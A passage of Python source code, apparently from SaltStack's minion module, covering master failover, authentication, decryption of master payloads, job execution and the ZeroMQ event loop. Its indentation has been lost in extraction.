'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module
opts['grains'] = salt.loader.grains(opts)
# evaluate the master to connect to and authenticate with it
opts['master'] = self.eval_master(opts,
timeout,
safe)
self.functions, self.returners, self.function_errors = self._load_modules()
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment'],
funcs=self.functions
).compile_pillar()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.proc_dir = get_proc_dir(opts['cachedir'])
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if 'mine.update' in self.functions:
log.info('Added mine.update to scheduler')
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': opts['mine_interval'],
'jid_include': True,
'maxrunning': 2
}
})
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master_ip': self.opts['master'],
'connected': True}
}
})
self.grains_cache = self.opts['grains']
# store your hexid to subscribe to zmq, hash since zmq filters are prefix
# matches this way we can avoid collisions
self.hexid = hashlib.sha1(self.opts['id']).hexdigest()
if 'proxy' in self.opts['pillar']:
log.debug('I am {0} and I need to start some proxies for {1}'.format(self.opts['id'],
self.opts['pillar']['proxy']))
for p in self.opts['pillar']['proxy']:
log.debug('Starting {0} proxy.'.format(p))
pid = os.fork()
if pid > 0:
continue
else:
proxyminion = salt.ProxyMinion()
proxyminion.start(self.opts['pillar']['proxy'][p])
self.clean_die(signal.SIGTERM, None)
else:
log.debug('I am {0} and I am not supposed to start any proxies. '
'(Likely not a problem)'.format(self.opts['id']))
# __init__() from MinionBase is called in Minion.eval_master()
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns the current master address. In standard mode, just calls
authenticate() with the given master address.
With master_type=func evaluates the current master address from the given
module and then calls authenticate().
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to connect is used to authenticate() and
then returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# check if master_type was altered from its default
if opts['master_type'] != 'str':
# check for a valid keyword
if opts['master_type'] == 'func':
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise TypeError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
except TypeError:
msg = ('Failed to evaluate master address from '
'module \'{0}\''.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
shuffle(opts['master'])
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Removing possibly failed master {0} from list of'
' masters'.format(opts['master']))
# create new list of master with the possibly failed one removed
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
local_masters = copy.copy(opts['master'])
for master in local_masters:
opts['master'] = master
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts)
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in self.opts:
self.opts['master_list'] = local_masters
try:
if self.authenticate(timeout, safe) != 'full':
conn = True
break
except SaltClientError:
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
self.connected = False
msg = ('No master could be reached or all masters denied '
'the minions connection attempt.')
log.error(msg)
else:
self.connected = True
return opts['master']
# single master sign in
else:
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts)
if self.authenticate(timeout, safe) == 'full':
self.connected = False
msg = ('master {0} rejected the minions connection because too '
'many minions are already connected.'.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
else:
self.connected = True
return opts['master']
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in self.opts.items():
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).get_memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
if self.opts.get('multimaster', False):
s_opts = copy.copy(self.opts)
functions = salt.loader.minion_mods(s_opts)
else:
functions = salt.loader.minion_mods(self.opts)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
return functions, returners, errors
def _fire_master(self, data=None, tag=None, events=None, pretag=None):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load)
except Exception:
log.info("fire_master failed: {0}".format(traceback.format_exc()))
def _handle_payload(self, payload):
'''
Takes a payload from the master publisher and does whatever the
master wants done.
'''
{'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[payload['enc']](payload['load'],
payload['sig'] if 'sig' in payload else None)
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, checks the signature if pub signatures
are turned on, decrypts it, and runs the encapsulated instructions
'''
# Verify that the signature is valid
master_pubkey_path = os.path.join(self.opts['pki_dir'], 'minion_master.pub')
if sig and self.functions['config.get']('sign_pub_messages'):
if not salt.crypt.verify_signature(master_pubkey_path, load, sig):
raise AuthenticationError('Message signature failed to validate.')
try:
data = self.crypticle.loads(load)
except AuthenticationError:
# decryption of the payload failed, try to re-auth but wait
# random seconds if set in config with random_reauth_delay
if 'random_reauth_delay' in self.opts:
reauth_delay = randint(0, float(self.opts['random_reauth_delay']))
# This mitigates the issue wherein a long-running job might not return
# on a master key rotation. However, new commands issued during the re-auth
# splay period will still fail to return.
if not salt.utils.minion.running(self.opts):
log.debug('Waiting {0} seconds to re-authenticate'.format(reauth_delay))
time.sleep(reauth_delay)
else:
log.warning('Ignoring re-auth delay because jobs are running')
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'arg' not in data:
return
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in data:
match_func = getattr(self.matcher,
'{0}_match'.format(data['tgt_type']), None)
if match_func is None:
return
if data['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = data.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(data['tgt'], delimiter=delimiter):
return
elif not match_func(data['tgt']):
return
else:
if not self.matcher.glob_match(data['tgt']):
return
# If the minion does not have the function, don't execute,
# this prevents minions that could not load a minion module
# from returning a predictable exception
#if data['fun'] not in self.functions:
# return
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_pub(self, load):
'''
Handle public key payloads
'''
pass
def _handle_clear(self, load):
'''
Handle un-encrypted transmissions
'''
pass
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if isinstance(data['fun'], string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
target = Minion._thread_multi_return
else:
target = Minion._thread_return
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
# If we are running in multi-master mode, re-inject opts into module funcs
if instance.opts.get('multimaster', False):
for func in instance.functions:
sys.modules[instance.functions[func].__module__].__opts__ = self.opts
if self.opts['multiprocessing']:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = multiprocessing.Process(
target=target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=target, args=(instance, self.opts, data),
name=data['jid']
)
process.start()
if not sys.platform.startswith('win'):
process.join()
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
salt.utils.appendproctitle(data['jid'])
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[data['fun']]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
sys.modules[func.__module__].__context__['retcode'] = 0
return_data = func(*args, **kwargs)
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = sys.modules[func.__module__].__context__.get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for {0!r} not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in {0!r} had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing {0!r}: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing {0!r}: {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = ('TypeError encountered executing {0}: {1}. See '
'debug log for more info.').format(function_name, exc)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = '{0!r} is not available.'.format(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: {0!r}'.format(minion_instance.function_errors[mod_name])
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle(data['jid'])
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return'):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'load': ret.get('__load__')}
load['return'] = {}
for key, value in ret.items():
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in list(ret.items()):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret))
try:
ret_val = channel.send(load)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
log.trace('ret_val = {0}'.format(ret_val))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _set_tcp_keepalive(self):
if hasattr(zmq, 'TCP_KEEPALIVE'):
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
def _set_reconnect_ivl(self):
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self.socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
def _set_reconnect_ivl_max(self):
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
def _set_ipv4only(self):
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.socket.setsockopt(zmq.IPV4ONLY, 0)
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def _setsockopts(self):
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self.socket.setsockopt(zmq.SUBSCRIBE, 'broadcast')
self.socket.setsockopt(zmq.SUBSCRIBE, self.hexid)
else:
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
self._set_ipv4only()
self._set_reconnect_ivl_max()
self._set_tcp_keepalive()
@property
def master_pub(self):
'''
Return the master publish port
'''
return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
port=self.publish_port)
def authenticate(self, timeout=60, safe=True):
'''
Authenticate with the master, this method breaks the functional
paradigm, it will update the master information from a fresh sign
in, signing in can occur as often as needed to keep up with the
revolving master AES key.
'''
log.debug(
'Attempting to authenticate with the Salt Master at {0}'.format(
self.opts['master_ip']
)
)
auth = salt.crypt.Auth(self.opts)
self.tok = auth.gen_token('salt')
acceptance_wait_time = self.opts['acceptance_wait_time']
acceptance_wait_time_max = self.opts['acceptance_wait_time_max']
if not acceptance_wait_time_max:
acceptance_wait_time_max = acceptance_wait_time
while True:
creds = auth.sign_in(timeout, safe)
if creds == 'full':
return creds
elif creds != 'retry':
log.info('Authentication with master at {0} successful!'.format(self.opts['master_ip']))
break
log.info('Waiting for minion key to be accepted by the master.')
if acceptance_wait_time:
log.info('Waiting {0} seconds before retry.'.format(acceptance_wait_time))
time.sleep(acceptance_wait_time)
if acceptance_wait_time < acceptance_wait_time_max:
acceptance_wait_time += acceptance_wait_time
log.debug('Authentication wait time is {0}'.format(acceptance_wait_time))
self.aes = creds['aes']
if self.opts.get('syndic_master_publish_port'):
self.publish_port = self.opts.get('syndic_master_publish_port')
else:
self.publish_port = creds['publish_port']
self.crypticle = salt.crypt.Crypticle(self.opts, self.aes)
def module_refresh(self, force_refresh=False):
'''
Refresh the functions and returners.
'''
self.functions, self.returners, _ = self._load_modules(force_refresh)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
self.module_refresh(force_refresh)
def manage_schedule(self, package):
'''
Refresh the functions and returners.
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
if func == 'delete':
self.schedule.delete_job(name)
elif func == 'add':
self.schedule.add_job(schedule)
elif func == 'modify':
self.schedule.modify_job(name, schedule, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, where)
elif func == 'run_job':
self.schedule.run_job(name, where)
elif func == 'disable_job':
self.schedule.disable_job(name, where)
elif func == 'reload':
self.schedule.reload(schedule)
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
Python does not handle the SIGTERM cleanly, if it is signaled exit
the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, package):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
load = salt.utils.event.SaltEvent.unpack(package)[1]
ret = channel.send(load)
return ret
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
log.debug('Handling event {0!r}'.format(package))
if package.startswith('module_refresh'):
self.module_refresh()
elif package.startswith('pillar_refresh'):
self.pillar_refresh()
elif package.startswith('manage_schedule'):
self.manage_schedule(package)
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(package)
elif package.startswith('_minion_mine'):
self._mine_send(package)
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif package.startswith('__master_disconnected'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
# if the master disconnect event is for a different master, raise an exception
if data['master'] != self.opts['master']:
raise Exception()
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master_ip': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
# if eval_master finds a new master for us, self.connected
# will be True again on successfull master authentication
self.opts['master'] = self.eval_master(opts=self.opts,
failed=True)
if self.connected:
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
del self.socket
del self.context
del self.poller
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._set_reconnect_ivl()
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self.poller.register(self.epull_sock, zmq.POLLIN)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master_ip': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master_ip': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
# Main Minion Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
self._prepare_minion_event_system()
self.socket = self.context.socket(zmq.SUB)
self._set_reconnect_ivl()
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self.poller.register(self.epull_sock, zmq.POLLIN)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = int(self.opts['loop_interval'])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
ping_interval = self.opts.get('ping_interval', 0) * 60
ping_at = None
while self._running is True:
loop_interval = self.process_schedule(self, loop_interval)
try:
socks = self._do_poll(loop_interval)
if ping_interval > 0:
if socks or not ping_at:
ping_at = time.time() + ping_interval
if ping_at < time.time():
log.debug('Ping master')
self._fire_master('ping', 'minion_ping')
ping_at = time.time() + ping_interval
self._do_socket_recv(socks)
# Check the event system
if socks.get(self.epull_sock) == zmq.POLLIN:
package = self.epull_sock.recv(zmq.NOBLOCK)
try:
self.handle_event(package)
self.epub_sock.send(package)
except Exception:
log.debug('Exception while handling events', exc_info=True)
# Add an extra fallback in case a forked process leeks through
multiprocessing.active_children()
except zmq.ZMQError as exc:
# The interrupt caused by python handling the
# SIGCHLD. Throws this error with errno == EINTR.
# Nothing to receive on the zmq socket throws this error
# with EAGAIN.
# Both are safe to ignore
if exc.errno != errno.EAGAIN and exc.errno != errno.EINTR:
log.critical('Unexpected ZMQError while polling minion',
exc_info=True)
continue
except SaltClientError:
raise
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
self._pre_tune()
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self._fire_master_minion_start()
loop_interval = int(self.opts['loop_interval'])
# On first startup execute a state run if configured to do so
self._state_run()
while self._running is True:
try:
socks = self._do_poll(loop_interval)
self._do_socket_recv(socks)
# Check the event system
except zmq.ZMQError:
# If a zeromq error happens recover
yield True
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
yield True
def _do_poll(self, loop_interval):
log.trace('Check main poller timeout {0}'.format(loop_interval))
return dict(self.poller.poll(
loop_interval * 1000)
)
def _do_socket_recv(self, socks):
if socks.get(self.socket) == zmq.POLLIN:
# topic filtering is done at the zmq level, so we just strip it
messages = self.socket.recv_multipart(zmq.NOBLOCK)
messages_len = len(messages)
# if it was one message, then its old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
